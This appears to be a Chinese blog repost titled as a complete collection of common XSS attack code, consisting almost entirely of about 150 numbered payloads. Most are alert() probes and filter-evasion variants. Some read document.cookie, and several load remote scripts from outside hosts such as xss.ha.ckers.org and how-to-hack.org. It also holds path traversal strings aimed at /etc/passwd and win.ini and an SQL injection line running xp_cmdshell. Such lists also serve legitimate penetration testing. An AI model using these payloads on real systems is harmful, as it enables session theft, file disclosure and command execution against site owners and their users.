当前位置:   article > 正文

XSS(跨站脚本攻击) - 常用代码大全_xss脚本代码

xss脚本代码

XSS(跨站脚本攻击) - 常用代码大全:

2020-03-05更新:增加42条xss代码

  1. 1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt>
  2. <svg/onload=alert(1)>
  3. <script>alert(document.cookie)</script>
  4. '><script>alert(document.cookie)</script>
  5. ='><script>alert(document.cookie)</script>
  6. <script>alert(vulnerable)</script>
  7. %3Cscript%3Ealert('XSS')%3C/script%3E
  8. <script>alert('XSS')</script>
  9. <img src="javascript:alert('XSS')">
  10. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  11. %22%3cscript%3ealert(%22xss%22)%3c/script%3e
  12. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  13. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
  14. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  15. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  16. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
  17. <script>alert('Vulnerable');</script>
  18. <script>alert('Vulnerable')</script>
  19. a.jsp/<script>alert('Vulnerable')</script>
  20. a?<script>alert('Vulnerable')</script>
  21. "><script>alert('Vulnerable')</script>
  22. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
  23. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  24. %3Cscript%3Ealert(document. domain);%3C/script%3E&
  25. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
  26. <IMG src="javascript:alert('XSS');">
  27. <IMG src=javascript:alert('XSS')>
  28. <IMG src=JaVaScRiPt:alert('XSS')>
  29. <IMG src=JaVaScRiPt:alert("XSS")>
  30. <IMG src=javascript:alert('XSS')>
  31. <IMG src=javascript:alert('XSS')>
  32. <IMG src=javascript:alert('XSS')>
  33. <IMG src="jav ascript:alert('XSS');">
  34. <IMG src="jav ascript:alert('XSS');">
  35. <IMG src="jav ascript:alert('XSS');">
  36. "<IMG src=java\0script:alert(\"XSS\")>";' > out
  37. <IMG src=" javascript:alert('XSS');">
  38. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  39. <BODY BACKGROUND="javascript:alert('XSS')">
  40. <BODY ONLOAD=alert('XSS')>
  41. <IMG DYNSRC="javascript:alert('XSS')">
  42. <IMG LOWSRC="javascript:alert('XSS')">
  43. <BGSOUND src="javascript:alert('XSS');">
  44. <br size="&{alert('XSS')}">
  45. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
  46. <LINK REL="stylesheet" href="javascript:alert('XSS');">
  47. <IMG src='vbscript:msgbox("XSS")'>
  48. <IMG src="mocha:[code]">
  49. <IMG src="livescript:[code]">
  50. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  51. <IFRAME src=javascript:alert('XSS')></IFRAME>
  52. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
  53. <TABLE BACKGROUND="javascript:alert('XSS')">
  54. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  55. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
  56. <DIV STYLE="width: expression(alert('XSS'));">
  57. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  58. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
  59. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  60. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
  61. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  62. <BASE href="javascript:alert('XSS');//">
  63. getURL("javascript:alert('XSS')")
  64. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
  65. <XML src="javascript:alert('XSS');">
  66. "> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  67. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
  68. <IMG src="javascript:alert('XSS')"
  69. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
  70. '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
  71. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  72. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
  73. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
  74. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
  75. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
  76. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
  77. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
  78. <IMG SRC=javascript:alert(‘XSS’)>
  79. <IMG SRC=# onmouseover=”alert(‘xxs’)”>
  80. <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
  81. <img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>
  82. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
  83. &#39;&#88;&#83;&#83;&#39;&#41;>
  84. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  85. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  86. <IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
  87. <IMG SRC= &#14javascript:alert(‘XSS’);”>
  88. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  89. <IMG SRC=”javascript:alert(‘XSS’)”
  90. </script><script>alert(‘XSS’);</script>
  91. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
  92. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  93. <svg/onload=alert('XSS')>
  94. <IMG SRC=’vbscript:msgbox(“XSS”)’>
  95. <BGSOUND SRC="javascript:alert('XSS');">
  96. <BR SIZE="&{alert('XSS')}">
  97. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  98. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  99. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  100. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  101. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  102. <XSS STYLE="behavior: url(xss.htc);">
  103. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  104. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  105. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  106. <DIV STYLE="width: expression(alert('XSS'));">
  107. <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
  108. <script>alert(/xss/)</script>
  109. <svg onload=alert(document.domain)>
  110. <img src=document.domain onerror=alert(document.domain)>
  111. <M onmouseover=alert(document.domain)>M
  112. <marquee onscroll=alert(document.domain)>
  113. <a href=javascript:alert(document.domain)>M</a>
  114. <body onload=alert(document.domain)>
  115. <details open ontoggle=alert(document.domain)>
  116. <embed src=javascript:alert(document.domain)>
  117. <script>alert(1)</script>
  118. <sCrIpT>alert(1)</sCrIpT>
  119. <ScRiPt>alert(1)</ScRiPt>
  120. <sCrIpT>alert(1)</ScRiPt>
  121. <ScRiPt>alert(1)</sCrIpT>
  122. <img src=1 onerror=alert(1)>
  123. <iMg src=1 oNeRrOr=alert(1)>
  124. <ImG src=1 OnErRoR=alert(1)>
  125. <img src=1 onerror="alert(&quot;M&quot;)">
  126. <marquee onscroll=alert(1)>
  127. <mArQuEe OnScRoLl=alert(1)>
  128. <MaRqUeE oNsCrOlL=alert(1)>
  129. <a href=javascript:/0/,alert(%22M%22)>M</a>
  130. <a href=javascript:/00/,alert(%22M%22)>M</a>
  131. <a href=javascript:/000/,alert(%22M%22)>M</a>
  132. <a href=javascript:/M/,alert(%22M%22)>M</a>
  133. <base href=javascript:/M/><a href=,alert(1)>M</a>
  134. <base href=javascript:/M/><iframe src=,alert(1)></iframe>
  135. </textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>
  136. "><img src=x onerror=alert(document.cookie)>.gif
  137. <div style="background-image:url(javascript:alert(/xss/))">
  138. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  139. <iframe src=javascript:alert(1)></iframe>
  140. <iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
  141. <iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
  142. <iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
  143. <iframe src=https://baidu.com width=1366 height=768></iframe>
  144. <iframe src=javascript:alert(1) width=1366 height=768></iframe
  145. <form action=javascript:alert(1)><input type=submit>
  146. <form><button formaction=javascript:alert(1)>M
  147. <form><input formaction=javascript:alert(1) type=submit value=M>
  148. <form><input formaction=javascript:alert(1) type=image value=M>
  149. <form><input formaction=javascript:alert(1) type=image src=1>
  150. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/秋刀鱼在做梦/article/detail/921611
推荐阅读
相关标签
  

闽ICP备14008679号